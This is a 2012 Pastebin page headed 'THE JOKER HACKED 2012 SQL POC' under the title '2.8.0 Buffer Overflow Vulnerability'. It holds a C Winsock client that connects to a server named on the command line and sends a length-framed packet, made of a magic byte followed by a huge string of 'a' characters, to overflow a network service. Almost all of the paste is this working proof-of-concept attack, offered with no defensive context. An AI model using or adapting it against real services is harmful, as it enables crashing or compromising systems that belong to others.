API tools faq
paste
Advertisement
YeiZeta

2.8.0 Buffer Overflow Vulnerability

YeiZeta
Jun 8th, 2012
179
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.69 KB | None | 0 0
raw download clone embed print report
  1.  
  2. ////////////////////////////////////////////////////////////////
  3. // //
  4. // THE JOKER HACKED 2012 SQL POC //
  5. // //
  6. //
  7. // //
  8. // //
  9. ////////////////////////////////////////////////////////////////
  10.  
  11. #define WIN32_LEAN_AND_MEAN
  12. #include <winsock2.h>
  13. #include <stdlib.h>
  14. #include <stdio.h>
  15. #include <string.h>
  16.  
  17. #define DEFAULT_PORT 10008
  18. // TCP socket type
  19. #define DEFAULT_PROTO SOCK_STREAM
  20. void senddata();
  21. void recvdata();
  22. WSADATA wsaData;
  23. SOCKET conn_socket;
  24. char Buffer[2000000];
  25. char inBuffer[128];
  26.  
  27. void Usage()
  28. {
  29. printf("Usage: scriptfubof servername portnumber\n");
  30. fflush(stdout);
  31. exit(1);
  32. }
  33.  
  34. int main(int argc, char *argv[])
  35. {
  36.  
  37. // default to localhost
  38. char *server_name= "localhost";
  39. unsigned short port = DEFAULT_PORT;
  40. int i, loopcount, maxloop=-1;
  41. int retval;
  42. unsigned int addr;
  43. int socket_type = DEFAULT_PROTO;
  44. struct sockaddr_in server;
  45.  
  46. if (argc < 3) {
  47. Usage();
  48. }
  49.  
  50. if ((retval = WSAStartup(0x202, &wsaData)) != 0)
  51. {
  52. fprintf(stderr,"WSAStartup() failed with error %d\n", retval);
  53. WSACleanup();
  54. return -1;
  55. }
  56.  
  57. // Get portnum
  58. port = atoi(argv[2]);
  59.  
  60. memset(&server, 0, sizeof(server));
  61. server.sin_addr.s_addr = inet_addr(argv[1]);
  62. server.sin_family = AF_INET;
  63. server.sin_port = htons(port);
  64.  
  65. conn_socket = socket(AF_INET, socket_type, 0); /* Open a socket */
  66. if (conn_socket <0 )
  67. {
  68. fprintf(stderr,"Client: Error Opening socket: Error %d\n", WSAGetLastError());
  69. WSACleanup();
  70. return -1;
  71. }
  72.  
  73. if (connect(conn_socket, (struct sockaddr*)&server, sizeof(server)) == SOCKET_ERROR)
  74. {
  75. fprintf(stderr,"Client: connect() failed: %d\n", WSAGetLastError());
  76. WSACleanup();
  77. return -1;
  78. }
  79.  
  80. // Send the data
  81. senddata();
  82.  
  83. // recieve a msg
  84. recvdata();
  85.  
  86. closesocket(conn_socket);
  87. WSACleanup();
  88.  
  89. return 0;
  90. }
  91.  
  92. void senddata() {
  93.  
  94. int loopcount = 0, retval =0;
  95. unsigned char command[]="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa";
  96.  
  97.  
  98. Buffer[0]='\x47'; //Magic byte 'G'
  99. Buffer[1]=sizeof(command)/256; //High byte of L - L div 256
  100. Buffer[2]=sizeof(command)%256; //Low byte of L - L mod 256
  101. strcpy(&Buffer[3],command);
  102.  
  103. retval = send(conn_socket, Buffer, sizeof(command) +3, 0);
  104. if (retval == SOCKET_ERROR)
  105. {
  106. fprintf(stderr,"Client: send() failed: error %d.\n", WSAGetLastError());
  107. WSACleanup();
  108. return;
  109. }
  110. else
  111. printf("Client: send() is OK.\n");
  112. printf("Client: Sent data \"%s\"\n", Buffer);
  113.  
  114. }
  115.  
  116. void recvdata() {
  117. int i=0;
  118. int retval=0;
  119. memset(inBuffer,0,128);
  120.  
  121. retval = recv(conn_socket, inBuffer, 128, 0);
  122. printf("retval is :%d\n", retval);
  123. printf("first char is: %x\n", inBuffer[0]);
  124. if (retval == SOCKET_ERROR)
  125. {
  126. fprintf(stderr,"Client: recv() failed: error %d.\n", WSAGetLastError());
  127. closesocket(conn_socket);
  128. WSACleanup();
  129. return;
  130. }
  131. else {
  132. printf("Client: recv() is OK.\n");
  133.  
  134. // print the message contents...
  135.  
  136. for (i=0;i<retval;i++) {
  137. printf("%c", inBuffer[i]);
  138.  
  139. }
  140. printf("\n");
  141. fflush(stdout);
  142. }
  143.  
  144. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!